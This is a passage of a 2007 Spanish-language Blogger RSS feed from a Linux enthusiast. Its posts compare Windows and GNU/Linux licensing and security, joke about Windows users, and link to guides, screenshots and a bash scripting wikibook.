los derechos de los desarrolladores originales para mantener la continuidad y la accesibilidad del código fuente para el software.&lt;br /&gt;&lt;br /&gt;Cabe hacer notar que la licencia utilizada para este estudio fue la EULA, por que es representante del más nuevo sistema operativo que Microsoft tiene al público para el usuario promedio.&lt;br /&gt;&lt;br /&gt;De la conclusión del estudio se pueden citar los siguientes puntos de interés para el debate:&lt;br /&gt;&lt;br /&gt;La licencia EULA&lt;br /&gt;&lt;br /&gt;*Se prohíbe la copia.&lt;br /&gt;*Puede ser empleado en un único ordenador con un máximo de 2 procesadores.&lt;br /&gt;*No puede ser empleado como Web Server o File Server.&lt;br /&gt;*Registro necesario a los 30 días.&lt;br /&gt;*Puede dejar de funcionar si se efectúan cambios en el hardware.&lt;br /&gt;*Las actualizaciones del sistema pueden modificar la licencia, si la compañía lo desea. *Sólo puede ser transferida una vez a otro usuario.&lt;br /&gt;*Impone limitación sobre la ingeniería inversa.&lt;br /&gt;*Da a Microsoft derecho para en cualquier momento recoger información del sistema y su uso, y también para entregar dicha información a terceros.&lt;br /&gt;*La garantía es por los primeros 90 días.&lt;br /&gt;*Actualizaciones y parches sin garantía.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La licencia GPL&lt;br /&gt;&lt;br /&gt;*Permite la copia, modificación y redistribución del software.&lt;br /&gt;*Proporciona garantía de los derechos del usuario a la copia, modificación y redistribución del software.&lt;br /&gt;*Como no tiene costo, tampoco ofrece garantías.&lt;br /&gt;*Puede ser vendido y se puede cobrar por los servicios sobre el software.&lt;br /&gt;*Cualquier patente sobre el mismo debe ser licenciada para el beneficio de todos.&lt;br /&gt;*El software modificado no debe tener costo por la licencia.&lt;br /&gt;*Tiene que incluir el código fuente.&lt;br /&gt;*Los cambios en la licencia deben mantener ciertos términos generales.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ventajas y desventajas entre Microsoft Windows y GNU Linux, mitos y realidades:&lt;br /&gt;Los servidores de red con Software Libre dominan el 65% del mercado mundial, mientras que Windows posee actualmente un 25%.&lt;br /&gt;&lt;br /&gt;Según una encuesta realizada recientemente por IBM, el 83% de las empresas planean realizar trabajos basados en GNU/Linux durante 2007, mientras que sólo el 23% está planificando lo mismo en base a Windows.&lt;br /&gt;&lt;br /&gt;En este contexto es oportuno citar unos párrafos muy jugosos reproducidos recientemente en varias revistas de seguridad informática con respecto a la eficacia de ambos sistemas operativos.&lt;br /&gt;&lt;br /&gt;Andrew Kutz es un experto en virtualización (técnica que permite correr un sistema operativo dentro de otro, para aprovechar recursos de hardware), y es además Microsoft Certified Solutions Developer (MCSD) y Certified Windows Security Administrator (CWSA) por SANS/GIAC, es decir, un experto en desarrollos de Microsoft y en administración de seguridad en Windows.&lt;br /&gt;&lt;br /&gt;Kutz conoce muy bien el mundo del Software Libre y GNU/Linux, y declara lo siguiente: "Lo cierto es que manejo tanto servidores Windows como Linux y tengo que instalar muchos más parches en los servidores Windows que en sus hermanos Linux.&lt;br /&gt;&lt;br /&gt;Tal y como "sale de la caja", Linux da una paliza a Windows en lo que se refiere a seguridad pre-configurada. Eso no equivale a decir que Windows no puede ser hecho seguro. De hecho, &lt;span style="font-size:78%;"&gt;&lt;span style="font-style: italic;"&gt;un servidor Windows bien configurado es mucho más fácil de manejar (en mi opinión personal) que un servidor Linux&lt;/span&gt;&lt;/span&gt;, pero eso no anula el hecho de que si se instala un servidor con Windows y el de al lado con Linux, se ponen ambos en la red y se abandona la habitación, el servidor Windows va a ser el que resulte secuestrado."&lt;br /&gt;&lt;br /&gt;¡Más claro que el agua!&lt;br /&gt;&lt;br /&gt;Personalmente, me hago la pregunta: ¿por qué si GNU/Linux es considerado por la gran mayoría de expertos en seguridad el sistema más seguro, el uso masivo entre los usuarios de PCs de escritorio aún no llega?&lt;br /&gt;&lt;br /&gt;Y me adelanto a responder: Quizá porque la seguridad no es prioritaria en las computadoras de uso doméstico o en las oficinas de los diversos tipos de instituciones, sean estatales o privadas.&lt;br /&gt;&lt;br /&gt;Las migraciones de los últimos tiempos (Ej.: 14.000 computadoras estatales en Munich, Alemania) nos muestran que cuanto más profesional y seria es una institución, más propensa es a usar GNU/Linux.&lt;br /&gt;&lt;br /&gt;Se ha demostrado, además, que se valoran otros beneficios que brinda este sistema. Por ejemplo: la independencia tecnológica, el bajo costo, las libertades para adaptarlo a las necesidades de cada caso y, muchas veces, la posibilidad de contribuir con mejoras al software y así ayudar a otras personas e instituciones.&lt;br /&gt;&lt;br /&gt;Si me hablan de seguridad informática, debo decir que en mi sistema operativo GNU/Linux no tuve ningún caso de vulnerabilidad (virus, spyware, rootkits, troyanos, gusanos) en casi 3 años que lo llevo usando, para lo cual no he tomado ninguna precaución.&lt;br /&gt;&lt;br /&gt;En el Internet, los alojamiento de sitio Web, correo POP3, IMAP, y SMTP, el 78% se encuentran bajo la plataforma de GNU Linux, ya que este posee una variedades de motores para servidores de correos y páginas Web, sin costo y con una estabilidad confiable, por lo que no es tanto por lo Gratis sino por su robustez y confiabilidad de este. en tanto Microsoft posee la combinación de IIS (Internet Information Services), SQL Server, Exchange Server, los cuales poseen un porcentaje mayor de vulnerabilidad a los ataque de hackers o crackers, además de que deben ser pagados a Microsoft por cada usuario en el servidor, a pesar de ser más vulnerable a los ataques.&lt;br /&gt;&lt;br /&gt;Se dice que esto se debe a que es el sistema operativo más usado y conocido, por consecuencia, al que más atacan, esto puede tener mucho de cierto, pero no es tan real, en lo referente al más usado.&lt;br /&gt;&lt;br /&gt;En realidad existe una estadística por zona donde en el Occidente y Latinoamérica, el más utilizado es Microsoft Windows XP, Vista, y sus aplicaciones; contrario al Oriente y Europa, donde se concentran la mayor cantidad de Computadores personales con GNU Linux, esto independientemente de la cantidad de servidor en la Mega Red (Internet).&lt;br /&gt;&lt;br /&gt;Autor: Nelson Castillo</description><link>http://okltsmash.blogspot.com/2007/12/ms-sobre-ventajas-y-desventajas-de.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-1584732213051417506</guid><pubDate>Sat, 29 Dec 2007 23:33:00 +0000</pubDate><atom:updated>2007-12-29T17:35:43.064-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">windows vs linux laboralmente</category><title>Ventajas de Windows frente a Linux en el trabajo</title><description>Este es un artículo por la mas interesante que te hara reflexionar&lt;br /&gt;acerca de Windows frente a Linux:&lt;br /&gt;&lt;br /&gt;# En las reuniones matinales entorno a la máquina de café se habla de&lt;br /&gt;los últimos virus sufridos por todo el mundo, menos usted, y se siente&lt;br /&gt;por ello marginado.&lt;br /&gt;# La ausencia de estrés y de cabreos enfurecedores delante de su&lt;br /&gt;ordenador le está convirtiendo en una blanda, plácida y sebosa bola de&lt;br /&gt;grasa, mientras que sus compañeros se mantienen tensos y alerta todo el&lt;br /&gt;día, estallando en un torbellino irascible a la menor ocasión. Usted&lt;br /&gt;envidia su combatividad.&lt;br /&gt;# Al no tener que recordar números de serie, claves, keywords, códigos&lt;br /&gt;de registro y períodos de evaluación, su memoria se está deteriorando&lt;br /&gt;preocupantemente. Sus compañeros, en cambio, recuerdan cientos de útiles&lt;br /&gt;y vitales códigos de registro, los cuales intercambian placenteramente,&lt;br /&gt;sin que usted pueda participar de su gozo.&lt;br /&gt;# La falta de impactantes pantallazos azules está atrofiando el pigmento&lt;br /&gt;azul de su retina, por lo que su oculista le ha recomendado que mire&lt;br /&gt;fijamente durante varias horas al día al logotipo de IBM. Sus&lt;br /&gt;compañeros, en cambio, han hiperdesarrollado su pigmento azul y pueden,&lt;br /&gt;de hecho, ver en la oscuridad.&lt;br /&gt;# En caso de una invasión de seres extraterrestres ultraviolentos (como&lt;br /&gt;sucede a menudo) , no podrá, tal como ocurre en "Independence Day",&lt;br /&gt;instalar Outlook en la nave principal de los invasores y de este modo&lt;br /&gt;destruir su civilización.&lt;br /&gt;# Al ser usted usuario de Linux no tiene ninguna excusa para reiniciar&lt;br /&gt;su ordenador docenas de veces al día, y observa con envidia como sus&lt;br /&gt;compañeros conversan amigablemente en los pasillos durante sus&lt;br /&gt;placenteros reinicios, mientras usted se ve obligado -injustamente- a&lt;br /&gt;ser productivo todo el tiempo.&lt;br /&gt;# El dinero que los demás emplean tan provechosamente en licencias,&lt;br /&gt;soportes, períodos de renovación y derechos de utilización, usted lo&lt;br /&gt;malgasta en ir al cine, en cenas, y en alcohol, lo cual está&lt;br /&gt;deteriorando su salud enormemente.&lt;br /&gt;# Al no ser usted usuario de Windows, ningún amigo le llama para que&lt;br /&gt;emplee toda una tarde del fin de semana en reinstalar su ordenador, de&lt;br /&gt;modo que se aburre mortalmente mientras sus compañeros disfrutan&lt;br /&gt;agradablemente de sus relaciones sociales.&lt;br /&gt;# Se ve obligado a leer todos los correos que le envía su jefe, sin&lt;br /&gt;tener acceso al derecho universal de uso de la utilísima frase "El&lt;br /&gt;Outlook no me deja abrirlo", que sus compañeros tanto disfrutan.&lt;br /&gt;# El botón de reset de su ordenador está acumulando alarmantes&lt;br /&gt;cantidades de suciedad.</description><link>http://okltsmash.blogspot.com/2007/12/ventajas-de-windows-frente-linux-en-el.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-8953820133162845815</guid><pubDate>Tue, 18 Dec 2007 01:04:00 +0000</pubDate><atom:updated>2007-12-17T19:08:29.328-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">revive pc linux</category><title>Revive tu vieja PC</title><description>¿Tienes una antigua PC y quieres aprovecharla?&lt;br /&gt;&lt;br /&gt;Aca una genial guía que hice con todo lo que has de saber para regresarle la vida a ese Pentium 2 que tienes tirado:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/revive.doc"&gt;Documento en formato DOC&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://descargas.ltsmash.org/revive.pdf"&gt;Documento en formato PDF&lt;/a&gt;</description><link>http://okltsmash.blogspot.com/2007/12/revive-tu-vieja-pc.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-8171746436015118330</guid><pubDate>Sun, 09 Dec 2007 20:07:00 +0000</pubDate><atom:updated>2007-12-09T14:17:56.033-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">encuesta desktop</category><title>¿Cual Desktop prefieres? (LTSmash vs. trew)</title><description>Como discutimos &lt;a href="http://trew.icenetx.net/"&gt;Trew (Icenetx)&lt;/a&gt; y yo sobre quien tenía el mejor desktop, llegamos a la resolución de que lo mejor seróa hacer una encuesta sobre lo mismo aca en mi blog xD...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aca están los screens de mi Desktop:&lt;br /&gt;&lt;a href="http://okltsmash.blogspot.com/2007/12/mi-nuevo-desktop-kde.html"&gt;Screenshots LTSmash&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Acá el screen del de él...&lt;br /&gt;&lt;a href="http://trew.icenetx.net/gallery/dark-light.png"&gt;Screenshot Trew&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La encuesta a su derecha... se vale dejar comentarios tambien xD...&lt;br /&gt;VOTEN!!!</description><link>http://okltsmash.blogspot.com/2007/12/cual-desktop-prefieres-ltsmash-vs-trew.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-4262536810337392877</guid><pubDate>Sun, 09 Dec 2007 04:08:00 +0000</pubDate><atom:updated>2007-12-09T11:45:47.482-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">kde desktop screenshots</category><title>Mi Nuevo Desktop KDE</title><description>Así es, les presento mi nuevo y excelente desktop KDE, es Kubuntu pero WHO CARES?&lt;br /&gt;&lt;a href="http://http//img125.imageshack.us/img125/7762/screenkubublackappsgc0.png"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img337.imageshack.us/img337/8531/screenkubublackdesktopwn2.png"&gt;Escritorio&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img337.imageshack.us/img337/2632/screenkubublackfirefoxmk2.png"&gt;Navegador Web&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img337.imageshack.us/img337/4540/screenkubublackmusicpb5.png"&gt;Musica&lt;/a&gt;&lt;br /&gt;&lt;a href="http://img125.imageshack.us/img125/7762/screenkubublackappsgc0.png"&gt;Aplicaciones&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Se vale OPINAR xD...</description><link>http://okltsmash.blogspot.com/2007/12/mi-nuevo-desktop-kde.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-7086467253596888072</guid><pubDate>Tue, 27 Nov 2007 01:52:00 +0000</pubDate><atom:updated>2007-11-26T19:55:01.457-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">noticias ambiente microsoft intel</category><title>Microsoft, un peligro para el ambiente</title><description>&lt;p&gt;Muchos analistas han mencionado en los dos últimos decenios la alianza entre Microsoft e Intel (Wintel). Desde los blogs de iTWire se preguntan si en un mundo preocupado por el cambio climático y el calentamiento global el planeta puede darse el lujo de permitir que la alianza Wintel continúe.&lt;/p&gt;&lt;p&gt;No es ningún secreto que la clave de Wintel es conducir a la venta de dispositivos con mayor procesamiento capaz de alimentar las mayores necesidades software-hardware que impone Microsoft, especialmente en sus sistemas Windows, ávidos de recursos.&lt;/p&gt; &lt;p&gt;Como resultado, desde 1995 las sucesivas versiones de Windows son cada vez más complejas, más “ricas” y sobre todo cada vez más exigentes en consumo de recursos.&lt;/p&gt; &lt;p&gt;Además la llegada de Internet ha sido una gran ayuda para la alianza Wintel, generando la industria de “software de seguridad” que consume recursos de computación de Intel y proporciona a Microsoft combustible para desarrollar próximos sistemas “más seguros”.&lt;/p&gt; &lt;p&gt;El último ejemplo en la generosidad de la combinación soft-hard lo tenemos con Windows Vista. Un sistema que requiere al menos 4 Gbytes de espacio en disco para la instalación, 2 Gbytes de RAM, procesador dual a 2 GHz y una tarjeta gráfica dedicada para obtener resultados aceptables, necesitando sistemas incluso superiores para obtener un buen rendimiento. Estas configuraciones necesitan grandes sistemas de refrigeración y grandes consumos energéticos.&lt;/p&gt; &lt;p&gt;Según el articulista “es como usar una bomba atómica para matar una hormiga”, para el uso que por ejemplo el necesita para procesamiento de textos, hoja de cálculo o publicación en sitios web.&lt;/p&gt; &lt;p&gt;El mismo, compara la instalación de una distro Linux como Ubuntu con bastantes menos requerimientos para hacer tareas similares y que no requieren estar constantemente actualizando el hardware.&lt;/p&gt; &lt;p&gt;En resumen que Microsoft está aplicando políticas que son contrarias a los principios de una IT verde. (Desde aquí nos atreveríamos a incluir a otras como NVIDIA o ATI cuyas tarjetas gráficas son un ejemplo de dispositivos devoradores de recursos…)&lt;/p&gt; &lt;p&gt;Intel (y AMD llegado el caso) pueden argumentar que los nuevos procesadores de doble núcleo son más eficientes que los de un solo núcleo, pero el mayor poder de procesamiento lleva inevitablemente a un mayor consumo energético que siempre tendrá un sistema Windows que requiera esa mayor potencia.&lt;/p&gt; &lt;p&gt;Según el articulista, Microsoft en vez de pensar en estirar los límites de un nuevo hardware más potente, debería enfocar sus esfuerzos en aprovechar de la mejor forma posible el ya existente.&lt;/p&gt; &lt;p&gt;El SP3 del XP puede ser un paso en la dirección correcta, cuando en las pruebas preliminares las tareas se ejecutan más rápido que en equipos de su predecesor con el hardware existente.&lt;/p&gt; &lt;p&gt;“Aunque Vista sea un “elegante sistema operativo”, tal vez sea hora que Microsoft reconsidere vender a sus clientes un sistema operativo que requiere más energía y recursos energéticos en un momento en que la conservación de la energía están en mente de los consumidores”, remacha.&lt;/p&gt;&lt;br /&gt;&lt;a href="http://www.theinquirer.es/2007/11/26/es_microsoft_un_peligro_para_el_medio_ambiente.html"&gt;Fuente&lt;/a&gt;</description><link>http://okltsmash.blogspot.com/2007/11/microsoft-un-peligro-para-el-ambiente.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-4472129311388399180</guid><pubDate>Mon, 19 Nov 2007 01:23:00 +0000</pubDate><atom:updated>2007-11-18T19:26:21.860-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">wireless linux</category><title>Suprema base de Datos sobre Wireless en GNU/Linux</title><description>¿Quieres hacer andar a tu Wireless en Linux, pero no puedes?&lt;br /&gt;¿Ni siquiera sabes si funciona en Linux, o que tan bien lo hace?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://linux-wless.passys.nl/"&gt;Base de Datos Wireless en Linux aca&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;He ahi tu solucion. Una genial base de datos donde te dicen si funciona, que tan bien y que driver necesitas.</description><link>http://okltsmash.blogspot.com/2007/11/suprema-base-de-datos-sobre-wireless-en.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-4612588424928327906</guid><pubDate>Thu, 15 Nov 2007 21:53:00 +0000</pubDate><atom:updated>2007-11-15T15:55:45.777-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">gnu bash linux novatos scripting tutorial</category><title>GNU/BASH Scripting para principiantes</title><description>Asi es amigos lectores del blog, les comunico que estoy creando un manual de BASH Scripting para todos aquellos que se introducen a Linux y quieren saber mas sobre como aprovecharlo al maximo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://es.wikibooks.org/wiki/El_Manual_de_BASH_Scripting_B%C3%A1sico_para_Principiantes"&gt;WikiLibro&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PD: BASH no es BATCH</description><link>http://okltsmash.blogspot.com/2007/11/gnubash-scripting-para-principiantes.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-2993761014685352363</guid><pubDate>Wed, 07 Nov 2007 23:35:00 +0000</pubDate><atom:updated>2008-12-09T17:00:41.150-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">windows imac bsod</category><title>Windows funcionando perfectamente en un iMac</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zRvfcoc_luA/RwfybLXUwCI/AAAAAAAAAFI/H-S0UalkGFo/s400/544385735_f45a3e54e1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://2.bp.blogspot.com/_zRvfcoc_luA/RwfybLXUwCI/AAAAAAAAAFI/H-S0UalkGFo/s400/544385735_f45a3e54e1.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;xD</description><link>http://okltsmash.blogspot.com/2007/11/windows-funcionando-perfectamente-en-un.html</link><author>noreply@blogger.com (LTSmash)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://2.bp.blogspot.com/_zRvfcoc_luA/RwfybLXUwCI/AAAAAAAAAFI/H-S0UalkGFo/s72-c/544385735_f45a3e54e1.jpg" width="72"/><thr:total>1</thr:total></item></channel></rss>